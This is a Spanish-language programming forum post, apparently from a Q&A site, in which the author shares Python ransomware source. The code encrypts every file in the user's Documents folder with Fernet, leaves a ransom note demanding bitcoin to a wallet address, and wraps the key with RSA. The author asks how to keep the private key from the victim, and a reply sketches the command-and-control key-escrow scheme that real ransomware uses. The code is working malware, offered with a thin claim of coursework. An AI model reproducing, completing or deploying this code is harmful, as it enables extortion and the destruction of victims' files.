# Duda sobre encriptar clave privada

Tags: python, criptografía, rsa

Escribo debido a que tengo varias dudas acerca de un código que estoy realizando, resulta que tengo un *ransomware* el cual cifra los ficheros de x carpeta y genera una clave simétrica con la librería *Fernet* y otra clave publica y privada con *RSA*, las cuales uso para encriptar la clave simétrica para que el usuario no tenga acceso a ella y desencriptarla para el programa de desencriptado. El problema viene a que no se me ocurre como poder encriptar la clave privada para que el usuario no tenga acceso a ella y después desencriptarla en el programa de desencriptado. Gracias de antemano y un saludo.

Adjunto código.

```
import os
from cryptography.fernet import Fernet
import PySimpleGUI
import random
import rsa
import time

if os.path.exists(os.path.expanduser('~')+"/Documents/README.txt") == False:

    def generarkey():                   #Para generar una key
        key = Fernet.generate_key()     #Creamos una variable en la que almacenamos la clave
        with open ('symmetric.txt', 'wb') as key_file:        
            key_file.write(key)
    generarkey()


    (pubkey, privkey)=rsa.newkeys(2048) #Creacion clave publica y privada

    #Escribimos la key en un archivo
    pukey=open('publickey.txt','wb')
    pukey.write(pubkey.save_pkcs1('PEM'))
    pukey.close()
    #Escribimos la key en un archivo
    pvkey=open('privatekey.txt','wb')
    pvkey.write(privkey.save_pkcs1('PEM'))
    pvkey.close()

    #Encrypt

    skey=open('symmetric.txt','rb')
    key=skey.read()
    cipher=Fernet(key)

    #Abrir archivos a encriptar
    usuario = [os.path.expanduser('~')+"/Documents"]

    items = os.listdir(usuario[0])
    archivos_2 = [usuario[0]+"/"+x for x in items]
    for x in archivos_2:
        with open(x, 'rb') as file:
            archivosDat=file.read()
        encryptDat=cipher.encrypt(archivosDat)
        with open(x, 'wb') as file:
            file.write(encryptDat)
            
    with open(usuario[0]+"/"+"README.txt", "w") as file:
        file.write("Archivos encriptados, inserta 50 euros en bitcoins en la siguiente cartera para recuperar los archivos:\n")
        file.write("\n1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa")
        file.write("\nSi no se realiza el ingreso en 24 horas se destruiran todos los archivos robados\n")
        file.write("Si borra los archivos se perdera todo para siempre, el cementerio ya esta lleno de valientes")

    pkey=open('publickey.txt','rb')
    pkdata=pkey.read()
    

    #Cargar el archivo
    pubkey=rsa.PublicKey.load_pkcs1(pkdata)

    #Encrypt simmetric key con la public key
    encrypted_key=rsa.encrypt(key,pubkey)

    #Escribir la clave simetrica encriptada
    with open('symmetric.txt', 'wb') as file:
        file.write(encrypted_key)
```

Comment: Es para un trabajo de universidad sobre criptografía(no delincuencia)

Comment: segun tengo entendido al inicio del incidente generas clave publica clave privada y un guid del sistema, guid y private key se envian al cc se retiene solo guid y public key, private key se purga de memoria. public key encrypta datos, la nota de rescate muestra guid , previo arreglo de condiciones cc libera el private key asociado al guid la cual es usada para desencryptar la data finalizando el incidente.